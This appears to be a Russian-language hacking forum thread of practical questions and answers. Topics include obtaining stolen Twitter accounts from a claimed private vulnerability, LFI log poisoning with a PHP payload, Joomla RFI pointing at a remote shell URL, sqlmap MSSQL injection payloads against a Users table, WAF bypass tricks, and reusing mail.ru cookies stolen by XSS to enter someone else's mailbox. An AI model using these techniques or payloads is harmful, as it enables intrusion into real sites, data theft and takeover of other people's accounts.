Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
Кто сколько успеет собрать, всем хакерам которые имеют эту багу распределены время сбора, акки бывают и свежие и старореги!11
Да, это заметил что микс. А как по странам фильтруют то? Хм и где можно найти этих хакеров/приобрести долю/мониторить сосстояние бага?
При доступу к БД сайта можно выводить аккаунты по странам и кол-во фолловеров. Стукни продавцам акков, они может продадут или посоветуют у кого купить.
Загадка небольшая Есть 3 сайта 1 человека.. на них стоят игровые сервера(ну сайты для регистрации, изменения пароля и т.п..клиентские игры..причем разные) есть файл login.aspx(но он не для входа.. вроде бы) В одном из них test10a|9cbea4ebc53dfb893f124932246b60ec|12341234 В других 1|test10a|120971264| Может быть кто-то знает для чего это вообще нужно?(
ребят помогите плз нашел LFI нашел error_log , обратился к сайту site.com/dir/file.css<?php phpinfo(); ?> делаю инклуд лога но в самом логе записывается вот так ss/icon.css%3C?php%20phpinfo();%20?%3E. как побороть эту кодировку ? ( чтоб <?php ?> нормально записывало ?
в общем детский вопрос по рфи пример рфи в джумле как должен выглядеть путь к шелу? mosConfig_absolute_path так и должно быть или там нужно что то другое вписывать?
Если RFI и все зависимости удовлетворены, то удобнее всего http://site.ru/shell, а в конце ты прописываешь расширение, с которым идет запрос. Посмотреть его можно или в исходниках, или в логах.
Народ подскажите в чем беда. использую SQLMAP, язва такого рода back-end DBMS: Microsoft SQL Server 2012 Place: GET Parameter: sku Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: sku=-2896' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(111)+CHAR(113)+CHAR(121)+CHAR(73)+CHAR(87)+C HAR(122)+CHAR(67)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR(82)+CHAR(79)+CHAR(113)+CHAR(103)+CHAR(119)+CHAR(114)+CHAR(113)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: sku=USUSUSU'; WAITFOR DELAY '0:0:5'-- имена баз данных достает нормально, таблицы с текущей тоже все ок, колонки с таблицы ок, а вот данные не хочет тянуть! так пытается достать инфу sku=USUSUSU'; IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM dbname.dbo.Users),1,1))>1) WAITFOR DELAY '0:0:5'-- в чём может быть косяк??? заранее благодарен за ответы!
фильтруется просто слово select на сайте. т.е даже если www.site.com/asfselect123 попробовать ввести, он покажет что сайт хотят взломать. Как попробовать обойти можно?
Попробуйте принудительно все символы в url-encode загнать, это может сработать, заивист от типа ids\waf. Как вариант, поиграться с регистром. Или же вообще отойти от union select. Также можно попробовать определить waf\ids и глянуть на его исходники\стандартные правила. Есть тулза WAFW00F для этого.
Вопрос касательно хсс на маилру украл я куки к примеру лежат они у меня на сниффере Беру отправлялку запросов отпраляю запрос на главную с этими куками и вижу что я типо авторизован с чужого ящика После обновления страницы ничего этого не будет так как в браузер эти куки не запишутся... Как я понял в маилру главная кука отвечающая за вход Mpop меняю mpop в опере и открываю маилру и что же вы думаете? зашел? - НЕТ просит ввести заново пароль при этом кука больше не работает!! Какже зайти на почту с чужих кук?